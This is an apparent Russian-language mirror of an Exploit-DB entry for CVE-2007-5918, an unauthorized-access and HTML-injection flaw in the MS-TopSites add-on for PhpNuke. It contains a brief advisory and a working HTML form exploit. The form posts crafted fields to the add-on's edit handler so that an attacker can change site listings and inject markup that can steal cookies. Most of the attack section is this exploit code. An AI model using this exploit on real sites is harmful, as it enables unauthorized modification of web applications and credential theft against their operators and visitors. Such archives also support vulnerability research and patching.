- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 30745
- Проверка EDB
-
- Пройдено
- Автор
- 0X90
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5918
- Дата публикации
- 2007-11-06
HTML:
source: https://www.securityfocus.com/bid/26358/info
MS-TopSites is prone to an unauthorized-access vulnerability and an HTML-injection vulnerability because the application fails to sufficiently sanitize user-supplied data.
An attacker can exploit these issues to gain elevated privileges on the affected application, execute arbitrary code within the context of the webserver, and steal cookie-based authentication credentials.
<html><title>PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection</title>
<body bgcolor="black" text="white">
<form action="http://localhost:81/modules.php?name=MS_TopSites&file=edit " method="post">
<input size="92" type="text" value='' name="sname"> SiteNameTitle [sname] (not Target it must be changed in the source) <br />
<input size="92" type="text" value="" name="uname"> Username [uname] <br />
<input size="92" type="text" value=" http://www.0x90.com.ar" name="url"> Url<br />
<input size="92" type="text" value="[email protected]" name="email"> Email<br />
<input size="92" type="text" value='' name="bottonurl"> BottonUrl<br />
<input size="92" type="text" value="Art" name="cat"> Cat <br />
<input size="92" type="text" value="Wedonotneeddescriptions" name="description"> Descriptions<br />
<input type="hidden" value="MSTopSitesSaveSite" name="op"><br />
<input type="submit" value="submit"><br />
</body></form>
</html>
- Источник
- www.exploit-db.com